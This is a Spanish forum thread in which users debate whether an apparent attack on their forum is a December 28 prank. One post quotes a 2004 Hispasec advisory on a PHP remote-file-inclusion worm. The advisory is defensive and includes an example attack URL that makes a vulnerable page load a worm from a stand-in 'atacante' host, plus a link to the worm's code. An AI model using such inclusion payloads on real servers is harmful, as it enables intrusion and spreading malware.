FORO CONTROLADO

NaKo rebuznó:
me estais empezando a chinar

naki_a_chinao.jpg
 
yo rebuznó:
Aunque sea coña, nos van a hechar la culpa a 'los chupis'.

este tío es tonto ¿no? si fuese broma (que ni lo sé ni me importa, por ahora) cómo narices vamos a decir que han sido ellos si estamos aquí como si no hubiese pasado nada?
 
villano rebuznó:
El año pasado fue lo mismo, pero esa vez era la "guew".Este año lo mismo pero en el foro cantaba demasiado.La idea en si era buena , pero estaba repe.

y tu como lo sabes james, si estas registrado desde marzo?

pq te banearon? jaja
 
Buenas,
Si, lo cierto es que es dia 28... pero me da a mi que la broma es la de la boda... y esto una mala casualidad:


Hispasec - una-al-día 27/12/2004
Todos los días una noticia de seguridad www.hispasec.com
-------------------------------------------------------------------

Nuevo gusano para servidores web con PHP
----------------------------------------

Este nuevo espécimen puede infectar cualquier sitio web PHP que
contenga ciertos errores de programación. Al igual que "Santy",
también utiliza motores de búsqueda para localizar webs
potencialmente vulnerables, en esta ocasión Google Brasil y Yahoo.

Aunque en principio algunas casas antivirus lo han relacionado con el
gusano Santy que aprovechaba vulnerabilidades de phpBB, en realidad se
trata de un nuevo gusano que puede afectar a cualquier sitio web que
utilice PHP y que no haya sido programado de forma segura.

Es importante que los antivirus modifiquen el nombre dado al gusano,
que en un principio ha sido tratado como si fuera una variante de
Santy. Aunque tiene muchas similitudes, es importante tratarlo como
un nuevo gusano, ya que de lo contrario puede crear confusión si los
webmasters y programadores PHP piensan que sólo afecta a los sitios
web con una versión vulnerable de phpBB. En este sentido Kaspersky
lo ha pasado a denominar "Spyki" (Net-Worm.Perl.Spyki).

El nuevo gusano, escrito en Perl, aprovecha si el programador de la
página PHP ha hecho uso de las funciones include() y require() sin
filtrar adecuadamente los parámetros de entrada, lo que facilita al
atacante, o en este caso al gusano, insertar y ejecutar archivos en
el servidor de forma arbitraria.

En realidad se trata de una de las reglas básicas de la programación
segura que todo diseñador web debe tener en cuenta. Nunca debe de
abrir un archivo basándose en un parámetro externo sin comprobar
la validez del mismo. Pese a ello, es un error frecuente el permitir
hacer referencias a archivos externos, o internos saliendo de la
raíz pública del web, a través de un parámetro en la URL.

De forma que si nosotros tenemos un script para abrir archivos HTML
del servidor web, que por ejemplo podemos llamar de esta forma:

https://nuestroservidor/abrepagina.php?htm=index.htm

Un atacante podría provocar que cargara en su lugar un script
malicioso, o un gusano como en el caso que nos ocupa, de la forma:

https://nuestroservidor/abrepagina.php?htm=http://atacante/gusano.php

La solución pasa por evitar parámetros de forma arbitraria cuando
programamos el script PHP, filtrando todas las referencias que no
se ajusten a las páginas legítimas del servidor web.

Código del nuevo gusano
https://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php

Opina sobre esta noticia:
https://www.hispasec.com/unaaldia/2256/comentar
[/quote]
 
me aburoooooooo.....

IuGa rebuznó:
Buenas,
Si, lo cierto es que es dia 28... pero me da a mi que la broma es la de la boda...

Dos inocentadas en un día, el año que viene serán tres
 
Me cago en mi vida, un día sin enchufarme y me encuentro esta puta mierda.

Espero que, como ha dicho alguien, la coña sea la de la boda torbellinesca y no esta puta mierda, porque no le veo la gracia.

Y como se confirme que nos han metido linux por el cacas, ganas de matar: AUMENTANDO.
 
ufff uffff, esto espero que sea una broma como esa de que un maremoto ha destrozado la isla donde se rodo "la playa" (o eso no era broma)weno da igual, pero alguien ardera en el infierno si esto va en serio, porque teniente campano o torbe no se pronuncian sobre el tema?
 
Atrás
Arriba Pie